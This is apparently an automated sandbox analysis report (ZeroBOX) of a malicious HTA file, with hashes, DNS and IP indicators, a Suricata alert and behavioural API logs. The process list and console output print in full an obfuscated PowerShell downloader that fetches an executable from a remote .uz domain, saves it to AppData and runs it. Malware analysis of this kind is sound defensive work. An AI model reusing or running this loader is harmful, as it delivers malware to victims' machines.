Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 28, 2024, 9:42 a.m.	May 28, 2024, 9:44 a.m.

Size	10.5KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`d3c362ce51282a6583d86fd69a578c89`
SHA256	`c1fb5c1305d935a96ad60a093298ecff9b3f309b446678fd6dcb619a4ac61b06`
CRC32	`DB0C3992`
ssdeep	`96:1CrcLzhJpAJlHlDylDHlDKV6VkZBJlHlDTlDelDUhV6V2w0CJlHlDDslDelD8V6I:1Sc5JCBoofoLco1o1YSjYmORAZhOb3jQ`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\room5.hta
2564
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy, $cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQy}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$MwnACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240,77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdhpUHoLnOVAM.DownloadData($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpHLjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDovBirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk = $env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Path $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOpHLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270,77250,77258,77266,77258,77199,77270,77275,77200,77272,77264,77267,77253,77265,77267,77254,77268,77268,77200,77267,77264,77264,77262,77250,77199,77254,77273,77254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUGuLGImDnrHn;
  2656

Name	Response	Post-Analysis Lookup
eduaiqi.uz	A 83.69.139.250	83.69.139.250
x1.i.lencr.org	CNAME crl.root-x1.letsencrypt.org.edgekey.net CNAME e8652.dscx.akamaiedge.net A 23.52.33.11	23.52.33.11

IP Address	Status	Action
104.192.108.137	Active	Moloch
164.124.101.2	Active	Moloch
23.52.33.11	Active	Moloch
83.69.139.250	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 83.69.139.250:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49164 83.69.139.250:443	C=US, O=Let's Encrypt, CN=R3	CN=www.eduaiqi.uz	8b:07:fb:aa:8c:84:8c:2d:3d:75:ee:dc:ca:b9:45:f8:5d:dc:f7:67

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 27, 2024, 8:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 27, 2024, 8:44 a.m.			0	0

Command line console output was observed (50 out of 101 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: At line:1 char:708 console_handle: 0x00000053	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: + function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy, console_handle: 0x0000005f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: $cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJ console_handle: 0x0000006b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: QsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZ console_handle: 0x00000077	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: ncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powersh console_handle: 0x00000083	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: ell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith(( console_handle: 0x0000008f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQ console_handle: 0x0000009b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: y}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$Mwn console_handle: 0x000000a7	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: ACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240, console_handle: 0x000000b3	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: 77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]:: < console_handle: 0x000000bf	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: <<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdh console_handle: 0x000000cb	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: pUHoLnOVAM.DownloadData($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpH console_handle: 0x000000d7	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: LjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($ console_handle: 0x000000e3	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDov console_handle: 0x000000ef	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: BirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk = console_handle: 0x000000fb	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: $env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Pa console_handle: 0x00000107	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: th $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOp console_handle: 0x00000113	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: HLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270 console_handle: 0x0000011f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: 7254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUG console_handle: 0x00000143	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: uLGImDnrHn; console_handle: 0x0000014f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000015b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000167	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000187	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch console_handle: 0x00000193	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: annel." console_handle: 0x0000019f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: At line:1 char:806 console_handle: 0x000001ab	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: + function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy, console_handle: 0x000001b7	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: $cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJ console_handle: 0x000001c3	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: QsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZ console_handle: 0x000001cf	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: ncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powersh console_handle: 0x000001db	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: ell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith(( console_handle: 0x000001e7	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQ console_handle: 0x000001f3	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: y}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$Mwn console_handle: 0x000001ff	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: ACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240, console_handle: 0x0000020b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: 77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]::Se console_handle: 0x00000217	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: curityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdhpUHoLn console_handle: 0x00000223	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: OVAM.DownloadData <<<< ($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpH console_handle: 0x0000022f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: LjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($ console_handle: 0x0000023b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDov console_handle: 0x00000247	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: BirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk = console_handle: 0x00000253	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: $env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Pa console_handle: 0x0000025f	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: th $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOp console_handle: 0x0000026b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: HLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270 console_handle: 0x00000277	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: 7254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUG console_handle: 0x0000029b	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: uLGImDnrHn; console_handle: 0x000002a7	1	1
WriteConsoleW May 27, 2024, 8:44 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000002b3	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06487480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06487480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06487480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 27, 2024, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06487480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 27, 2024, 8:44 a.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://x1.i.lencr.org/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 168 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
